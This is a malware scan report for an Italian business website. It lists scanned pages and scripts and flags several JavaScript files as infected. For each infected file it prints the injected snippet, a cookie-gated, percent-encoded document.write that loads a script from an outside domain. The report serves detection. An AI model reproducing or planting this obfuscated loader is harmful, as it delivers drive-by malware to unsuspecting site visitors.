Scanned pages/files
| Request | Server response | Status |
http://www.emiliaromagna-pmi.it/ | 200 OK Content-Length: 48178 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.cosenza-imprese.it <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head><script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/cfform.js"></script> <script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/masks.js"></script> <meta http-equiv="content-type" content="text/html;charset=iso-8859- ...[4273 bytes skipped]... | ||
http://62.196.153.196/CFIDE/scripts/cfform.js | 200 OK Content-Length: 10617 Content-Type: application/x-javascript | clean |
http://62.196.153.196/CFIDE/scripts/masks.js | 200 OK Content-Length: 3897 Content-Type: application/x-javascript | clean |
http://www.emiliaromagna-pmi.it/common_net/modules/login_mask.js | 200 OK Content-Length: 6326 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var LoadHandler = { handlers:[], add:function(fn){ if(window.onload!=LoadHandler.theHandler) LoadHandler._push(window.onload); LoadHandler._push(fn); window.onload=LoadHandler.theHandler; }, _push:function(fn){ if(typeof(fn)!='function') return; LoadHandler.handlers[LoadHandler.handlers.length]=fn; }, theHandler:function(){ var handlers=LoadHandler.handlers,i=-1,fn; while(fn=handl if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.emiliaromagna-pmi.it/modules/GreyBox_v5_54/greybox/AJS.js | 200 OK Content-Length: 21599 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(!window.AJS){var AJS={BASE_URL:"",ajaxErrorHandler:null,getQueryArgument:function(f){var b=window.location.search.substring(1);var c=b.split("&");for(var a=0;a<c.length;a++){var d=c[a].split("=");if(d[0]==f){return d[1]}}return null},_agent:navigator.userAgent.toLowerCase(),_agent_version:navigator.productSub,isIe:function(){return(AJS._agent.indexOf("msie")!=-1&&AJS._agent.indexOf("opera")==-1)},isIe8:function(){return AJS._agent.indexOf("msie 8")!=-1},isSafari:function(a){if( if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.emiliaromagna-pmi.it/modules/GreyBox_v5_54/greybox/AJS_fx.js | 200 OK Content-Length: 8181 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) AJS.fx={_shades:{0:"ffffff",1:"ffffee",2:"ffffdd",3:"ffffcc",4:"ffffbb",5:"ffffaa",6:"ffff99"},highlight:function(c,a){var b=new AJS.fx.Base();b.elm=AJS.$(c);b.options.duration=600;b.setOptions(a);AJS.update(b,{increase:function(){if(this.now==7){c.style.backgroundColor="#fff"}else{c.style.backgroundColor="#"+AJS.fx._shades[Math.floor(this.now)]}}});return b.custom(6,0)},fadeIn:function(c,a){a=a||{};if(!a.from){a.from=0;AJS.setOpacity(c,0)}if(!a.to){a.to=1}var b=new AJS.fx.Style(c,"opacity",a);r if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.emiliaromagna-pmi.it/modules/GreyBox_v5_54/greybox/gb_scripts.js | 200 OK Content-Length: 14402 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var GB_CURRENT=null;GB_hide=function(a){GB_CURRENT.hide(a)};GreyBox=new AJS.Class({init:function(c){this.use_fx=AJS.fx;this.type="page";this.overlay_click_close=false;this.salt=0;this.root_dir=GB_ROOT_DIR;this.callback_fns=[];this.reload_on_close=false;this.src_loader=this.root_dir+"loader_frame.html";var b=window.location.hostname.indexOf("www");var a=this.src_loader.indexOf("www");if(b!=-1&&a==-1){this.src_loader=this.src_loader.replace("://","://www.")}if(b==-1&&a!=-1){this.sr if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.veneto-pmi.it/mediaplayer/swfobject.js | 200 OK Content-Length: 6887 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://www.emiliaromagna-pmi.it/common_net/modules/ddsmoothmenu/ddsmoothmenu.js | 200 OK Content-Length: 7999 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ddsmoothmenu={ arrowimages: {down:['downarrowclass', 'http://youbiz.omniatechnology.it/modules/ddsmoothmenu/down.gif', 30], right:['rightarrowclass', 'http://youbiz.omniatechnology.it/modules/ddsmoothmenu/right.gif']}, transition: {overtime:100, outtime:100}, shadow: {enable:true, offsetx:5, offsety:5}, detectwebkit: navigator.userAgent.toLowerCase().indexOf("applewebkit")!=-1, detectie6: document.all && !wind if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3868 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19471 Content-Type: text/javascript | clean |
http://www.emiliaromagna-pmi.it/index.cfm | 200 OK Content-Length: 48178 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.cosenza-imprese.it <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head><script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/cfform.js"></script> <script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/masks.js"></script> <meta http-equiv="content-type" content="text/html;charset=iso-8859- ...[4273 bytes skipped]... | ||
http://www.emiliaromagna-pmi.it/canali/associazioni | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 21:28:06 GMT Location: http://www.emiliaromagna-pmi.it/canali/associazioni/ Server: Apache/2.2.3 (CentOS) Content-Length: 349 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.emiliaromagna-pmi.it/canali/associazioni/ | 200 OK Content-Length: 54759 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.cosenza-imprese.it <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head><script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/cfform.js"></script> <script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/masks.js"></script> <meta http-equiv="content-type" content="text/html;charset=iso-8859- ...[4273 bytes skipped]... | ||
http://www.emiliaromagna-pmi.it/canali/associazioni/common_net/modules/login_mask.js | 404 Not Found Content-Length: 339 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: emiliaromagna-pmi.it
Result:
GET / HTTP/1.1
Host: emiliaromagna-pmi.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: emiliaromagna-pmi.it
Referer: http://www.google.com/search?q=emiliaromagna-pmi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: emiliaromagna-pmi.it
Referer: http://www.google.com/search?q=emiliaromagna-pmi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=emiliaromagna-pmi.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://emiliaromagna-pmi.it/
Result: emiliaromagna-pmi.it is not infected or malware details are not published yet.
Result: emiliaromagna-pmi.it is not infected or malware details are not published yet.